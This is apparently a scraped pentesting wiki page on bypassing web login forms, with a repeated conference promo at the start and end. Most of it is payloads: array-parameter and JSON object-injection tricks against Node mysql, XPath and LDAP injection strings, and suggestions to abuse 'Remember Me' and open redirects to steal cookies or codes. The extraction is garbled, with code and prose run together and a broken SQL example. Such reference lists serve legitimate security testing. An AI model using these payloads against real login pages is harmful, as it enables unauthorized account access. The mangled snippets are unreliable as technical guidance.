Search K
Appearance
Appearance
RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
If you find a login page, here you can find some techniques to try to bypass it:
user[]=a&pwd=b
, user=a&pwd[]=b
, user[]=a&pwd[]=b
Content-Type: application/json
password[password]=1
SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``
password=password=1
;
which makes the password bit to be always true."password":{"password": 1}
to bypass the login."stringifyObjects":true
option when calling mysql.createConnection
will eventually block all unexpected behaviours when Object
is passed in the parameter.Here you can find several tricks to bypass the login via SQL injections.
In the following page you can find a custom list to try to bypass login via SQL Injections:
Here you can find several tricks to bypass the login via No SQL Injections.
As the NoSQL Injections requires to change the parameters value, you will need to test them manually.
Here you can find several tricks to bypass the login via XPath Injection.
' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2
Here you can find several tricks to bypass the login via LDAP Injection.
*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|
If the page has "Remember Me" functionality check how is it implemented and see if you can abuse it to takeover other accounts.
Pages usually redirects users after login, check if you can alter that redirect to cause an Open Redirect. Maybe you can steal some information (codes, cookies...) if you redirect the user to your web.
<input autocomplete="false"
โโRootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.